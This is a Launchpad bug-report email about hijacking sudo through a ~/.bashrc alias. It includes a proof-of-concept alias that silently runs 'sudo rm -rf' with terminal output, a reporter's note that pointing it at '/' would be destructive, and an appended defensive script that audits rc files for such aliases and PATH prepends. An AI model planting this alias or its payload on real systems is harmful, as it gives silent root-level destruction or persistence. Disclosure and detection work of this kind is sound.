@seth-arnold I agree with you that there are other things to address as well.
In the art of hacking you most probably get into a system via some kind of service. You maybe have the privileges of a daemon. You then get access to the first user account. You want to escalate privilege and you search to find weaknesses.

As a system owner you want as many layers of protection as possible. It is a weakness that the PATH-variable can be set without giving your password, since an attacker can set their evil command before the one you expect in the execution priority. The same goes for the ALIAS-command. As demonstrated, they can help compromise your system. So you are right, there were more things to think about, but we all want a system as safe as possible.

-- 
https://bugs.launchpad.net/bugs/1893241

Title:
  attack alias sudo with nasty payload

Status in bash package in Ubuntu:
  Won't Fix

Bug description:
  Put the alias below in ~/.bashrc, which is writable by the current
  user, and wait for the user to open up a shell and become root. There
  are numerous possibilities. If you exchange "/tmp/aBSoLuTLYNoTHiNG"
  for "/" it becomes dangerous. Or imagine an attacker that can't become
  root in any other way and wants to set up a botnet.

  $ alias sudo='function f() { sudo -- rm -rf "/tmp/aBSoLuTLYNoTHiNG" ; sudo touch "/tmp/aBSoLuTLYNoTHiNG" ; echo "Everything removed!!" ; sudo "$@" ; } ; f "$@"'
  $ stat /tmp/aBSoLuTLYNoTHiNG
  stat: cannot stat '/tmp/aBSoLuTLYNoTHiNG': No such file or directory
  $ sudo echo 'hello wonderful world!'
  Everything removed!!
  hello wonderful world!
  $ stat /tmp/aBSoLuTLYNoTHiNG
    File: /tmp/aBSoLuTLYNoTHiNG
    Size: 0  Blocks: 0  IO Block: 4096  regular empty file
  Device: fd00h/64768d  Inode: 4718664  Links: 1
  Access: (0644/-rw-r--r--)  Uid: ( 0/ root)  Gid: ( 0/ root)
  Access: 2020-08-27 18:09:50.960080579 +0200
  Modify: 2020-08-27 18:09:50.960080579 +0200
  Change: 2020-08-27 18:09:50.960080579 +0200
   Birth: -

  File written by root!

  Fastest fix: Sudo is not allowed to be an alias.

  Extra information:
  $ lsb_release -rd
  Description: Ubuntu 20.04.1 LTS
  Release: 20.04
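
A defender-side check for the two vectors discussed in this thread (an alias for sudo in ~/.bashrc, and a PATH entry placed ahead of the expected one), as an added example that is not part of the original message or of bash or sudo. The guarded command list, the start-up file list, the finding names and the `--home` switch are assumptions made for illustration.

```shell
#!/bin/sh
# Added example (not from the bug report). Flags rc-file lines that can put
# user-writable code in front of a privileged command.
# Assumption: the guarded command list and the three rules below.
GUARDED='sudo|su|doas|pkexec'

# audit_rc FILE
# Prints FILE:LINE:KIND:TEXT per finding.
# Returns 0 = clean, 1 = findings, 2 = file not readable.
audit_rc() {
    [ -r "$1" ] || return 2
    awk -v f="$1" -v cmds="$GUARDED" '
        function report(kind) { print f ":" NR ":" kind ":" $0; n++ }
        BEGIN {
            # alias sudo=..., also as a later word: alias ls=... sudo=...
            alias_re = "(^|[ \t;&|])alias[ \t](.*[ \t])?(" cmds ")="
            # sudo() { ...   or   function sudo { ...
            func_re = "^[ \t]*(function[ \t]+)?(" cmds ")[ \t]*[(][ \t]*[)]"
            kw_re   = "^[ \t]*function[ \t]+(" cmds ")([ \t{]|$)"
        }
        /^[ \t]*#/ { next }                      # skip comment lines
        $0 ~ alias_re              { report("alias") }
        $0 ~ func_re || $0 ~ kw_re { report("function") }
        match($0, /(^|[ \t;])PATH="?/) {
            # A value that does not start with the old $PATH puts new
            # directories first in the lookup order: list it for review.
            v = substr($0, RSTART + RLENGTH)
            if (v !~ /^[$]([{]PATH[}]|PATH)/) report("path-prepend")
        }
        END { exit (n > 0) }
    ' "$1"
}

# Audit the usual per-user bash start-up files (assumed list).
audit_home() {
    status=0
    for rc in "$HOME/.bashrc" "$HOME/.bash_aliases" "$HOME/.profile" \
              "$HOME/.bash_profile"; do
        [ -e "$rc" ] || continue
        audit_rc "$rc" || status=1
    done
    return $status
}

# Run the home audit only when asked to, so the file can also be sourced.
if [ "${1:-}" = "--home" ]; then audit_home; fi
```

A path-prepend finding is a line to review, not proof of tampering: stock profiles often prepend a per-user bin directory.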